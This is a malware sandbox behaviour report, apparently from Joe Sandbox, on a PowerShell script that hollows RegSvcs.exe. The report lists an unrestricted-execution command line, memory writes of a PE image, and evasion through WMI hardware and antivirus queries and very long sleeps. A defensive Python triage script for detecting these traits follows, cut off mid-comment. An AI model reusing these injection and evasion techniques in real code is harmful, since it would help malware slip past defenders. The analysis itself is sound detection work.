Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853ECBC8C pushad ; iretd 0_2_00007FF853ECBC8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853EC4C00 push E8FFFFFFh; iretd 0_2_00007FF853EC4C0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853EC2315 pushad ; iretd 0_2_00007FF853EC232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF853ECA8DC push ebx; retf 0_2_00007FF853ECA8DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (this entry is repeated 49 times in the report)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9832
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 9945
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 36000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35890
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35781
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35672
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35562
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35453
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35344
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35219
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35109
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 35000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 34891
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 34781
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 34672
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 92.255.57.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"Default:BAPPDATAJ3e74489724f9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB8008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000003236000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager*
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003236000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managerh{Brx
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTeBr
      Source: RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTeBr(
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation (7 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
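The WMI enumeration, thread delays and cross-process memory writes listed in the two sections above are the raw events a triager correlates by hand: which WMI classes are VM fingerprints, whether a delay is effectively infinite (922337203685477 ms is Int64.MaxValue in 100-ns units expressed in milliseconds, roughly 29,000 years), and whether the process that wrote an MZ header into RegSvcs.exe is the same one that spawned it. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It works over behaviour lines normalised to the form `Source: <process> | <detail>`; the sample lines are constructed to mirror this report's entries, the set of VM-fingerprinting WMI classes is the editor's own, and the hollowing rule (parent created the child and wrote bytes starting with 4D5A into it) and the shrinking-delay heuristic are the editor's, not signatures the report itself applies.

```python
import re
from dataclasses import dataclass, field

# WMI classes that .NET loaders commonly enumerate to fingerprint a VM or sandbox
# (editor's list, not taken from the report).
VM_FINGERPRINT_CLASSES = {
    "Win32_PhysicalMemory", "Win32_DiskDrive", "Win32_Processor", "Win32_PnPEntity",
    "Win32_ComputerSystem", "Win32_BIOS", "Win32_VideoController",
}
TIMESPAN_MAX_MS = 922_337_203_685_477   # Int64.MaxValue 100-ns ticks in ms: effectively never returns
LONG_SLEEP_MS = 3 * 60 * 1000            # the report's own ">= 3 min" threshold

LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<detail>.+)$")
WMI_RE = re.compile(r"WMI Queries: IWbemServices::\w+ - (?P<ns>[\w\\]+) : (?P<query>.+)")
DELAY_RE = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")
CREATE_RE = re.compile(r"Process created: (?P<child>\S+)")
WRITE_RE = re.compile(r"Memory written: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)"
                      r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?")


@dataclass
class Findings:
    vm_fingerprint_classes: set = field(default_factory=set)
    av_discovery: bool = False
    infinite_sleeps: int = 0
    long_sleeps_ms: list = field(default_factory=list)
    longest_countdown: int = 0       # longest run of strictly decreasing delays from one process
    hollowing: list = field(default_factory=list)   # (parent, child, base address)


def parse(lines):
    """Yield (source process, detail) for lines of the form 'Source: <proc> | <detail>'."""
    for line in lines:
        if m := LINE_RE.match(line.strip()):
            yield m.group("src"), m.group("detail")


def triage(lines):
    f = Findings()
    created, writes = {}, []          # child image -> parent image; (writer, target, base, magic)
    last_delay, run = {}, {}
    for src, detail in parse(lines):
        if m := WMI_RE.search(detail):
            if m.group("ns").lower().endswith("securitycenter2") and "AntiVirusProduct" in m.group("query"):
                f.av_discovery = True
            if (cls := re.search(r"\b(Win32_\w+)\b", m.group("query"))) and cls.group(1) in VM_FINGERPRINT_CLASSES:
                f.vm_fingerprint_classes.add(cls.group(1))
        elif m := DELAY_RE.search(detail):
            ms = int(m.group("ms"))
            if ms >= TIMESPAN_MAX_MS:
                f.infinite_sleeps += 1
                continue
            if ms >= LONG_SLEEP_MS:
                f.long_sleeps_ms.append(ms)
            # A series of shrinking sleeps from one process looks like a loop re-arming on the
            # time remaining, which survives sandboxes that skip a single long sleep.
            run[src] = run.get(src, 0) + 1 if ms < last_delay.get(src, -1) else 1
            last_delay[src] = ms
            f.longest_countdown = max(f.longest_countdown, run[src])
        elif m := CREATE_RE.search(detail):
            created[m.group("child")] = src
        elif m := WRITE_RE.search(detail):
            writes.append((src, m.group("target"), int(m.group("base"), 16), m.group("magic")))
    # Correlate after the pass: the report lists the memory writes before the matching
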